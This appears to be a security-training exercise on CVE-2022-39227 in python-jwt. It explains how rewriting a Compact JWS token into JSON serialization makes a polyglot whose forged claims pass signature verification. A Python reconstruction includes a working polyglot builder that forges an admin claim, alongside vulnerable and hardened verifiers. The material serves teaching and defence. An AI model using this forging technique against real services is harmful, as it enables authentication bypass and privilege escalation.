JSON Web Token XV: CVE-2022-39227
This exercise covers the exploitation of a polyglot token against python_jwt (CVE-2022-39227).
In this exercise, we delve into CVE-2022-39227, a vulnerability in the python-jwt library (versions before 3.3.4) that allows an attacker to forge token contents without knowing the signing key. The issue arises from the way the library handles the two JWS formats: the underlying JWS deserializer accepts both JWS Compact Serialization and JWS JSON Serialization, but python_jwt then extracts the claims by splitting the raw token string on '.', as if it were always in Compact form. By rewriting a captured Compact token into the JSON format, an attacker can leave the genuine protected header, payload and signature in place for the signature check while placing a different, attacker-chosen payload where the claim parser will read it.
The result is a polyglot: one string that the JWS library parses as JSON Serialization and verifies successfully against the original payload, and that the claim parser reads as a Compact token carrying the forged claims, for example a payload that impersonates an admin user. The signature is checked, but not over the bytes the application ends up trusting. This exercise demonstrates the critical implications of improper token parsing and highlights why the claims returned to the application must be exactly the bytes the signature was verified over, and why a verifier should accept only the serialization it expects.
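The polyglot described above, worked through end to end as an added example. This is not code from the exercise or from python_jwt: the HMAC-SHA256 signing, the format-agnostic JWS deserializer and the two verifiers are stand-alone re-implementations that only model the behaviour python_jwt 3.3.3 inherited from its JWS library (verify the signature via the deserializer, then read the claims from `token.split('.')`). The secret, the claims and the function names are constructed for this demonstration, and the hardened verifier is one possible fix, not the project's own patch.

```python
"""CVE-2022-39227 polyglot, reconstructed (added example, not library code)."""
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"  # constructed sample key; never reuse


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # Pads like a typical JWS helper, then calls the stdlib decoder, which by
    # default (validate=False) silently DROPS characters outside the base64
    # alphabet such as '{', '"' and ' '.  That leniency is what lets a JSON
    # prefix sit in front of a real header and still decode cleanly.
    text += "=" * (-len(text) % 4)
    return base64.urlsafe_b64decode(text)


def sign_compact(claims: dict, key: bytes) -> str:
    """Issue an HS256 token in Compact Serialization (constructed issuer)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def jws_verify_payload(token: str, key: bytes) -> bytes:
    """Format-agnostic JWS verifier modelled on the library behaviour:
    accepts flattened JSON Serialization or Compact Serialization and
    returns the payload bytes the signature actually covered."""
    try:
        obj = json.loads(token)
        protected, payload, sig = obj["protected"], obj["payload"], obj["signature"]
    except ValueError:  # not JSON, so treat it as Compact Serialization
        protected, payload, sig = token.split(".")
    expected = hmac.new(key, f"{protected}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    return b64url_decode(payload)


def verify_jwt_vulnerable(token: str, key: bytes) -> dict:
    """Models the vulnerable flow: verify with the JWS layer, then take the
    claims from the raw string split on '.' rather than from the verified payload."""
    header, claims, _ = token.split(".")
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("alg not allowed")
    jws_verify_payload(token, key)            # passes: the signature is genuine
    return json.loads(b64url_decode(claims))  # but these bytes were never signed


def verify_jwt_fixed(token: str, key: bytes) -> dict:
    """Hardened: accept only Compact Serialization and return exactly the
    bytes the signature was verified over."""
    if token.count(".") != 2 or token.lstrip().startswith("{"):
        raise ValueError("only compact serialization is accepted")
    if json.loads(b64url_decode(token.split(".")[0])).get("alg") != "HS256":
        raise ValueError("alg not allowed")
    return json.loads(jws_verify_payload(token, key))


def make_polyglot(token: str, fake_claims: dict) -> str:
    """Rewrite a captured Compact token as a JSON object that the JWS layer
    verifies (genuine protected/payload/signature) while split('.') yields
    [real header, forged claims, rest] for the naive claim parser."""
    header, payload, sig = token.split(".")
    fake = b64url_encode(json.dumps(fake_claims).encode())
    # The first key carries the only two dots in the string.  Part 0 is
    # '{" ' + header: the decoder drops '{', '"' and ' ', so it still decodes
    # to the real header.  Part 1 is the forged payload.  Part 2 is the rest,
    # which contains no '.' because every value is base64url.
    return ('{" ' + header + '.' + fake + '.":"",'
            '"protected":"' + header + '","payload":"' + payload + '",'
            '"signature":"' + sig + '"}')


def demo() -> tuple:
    """Returns (claims the vulnerable verifier trusts, whether the fixed
    verifier rejects the polyglot, claims the fixed verifier returns for the
    genuine token)."""
    token = sign_compact({"sub": "user", "admin": False}, SECRET)
    polyglot = make_polyglot(token, {"sub": "user", "admin": True})
    forged = verify_jwt_vulnerable(polyglot, SECRET)
    try:
        verify_jwt_fixed(polyglot, SECRET)
        rejected = False
    except ValueError:
        rejected = True
    return forged, rejected, verify_jwt_fixed(token, SECRET)


if __name__ == "__main__":
    print(demo())
```

The two checks in `verify_jwt_fixed` are the practitioner's takeaway: reject any serialization you did not expect before parsing anything, and never decode claims from a second pass over the raw string once a verifier has handed back the signed payload. Passing `validate=True` to `base64.urlsafe_b64decode` would also have made part 0 of the polyglot fail to decode, but that only closes this particular encoding of the trick, not the underlying mismatch.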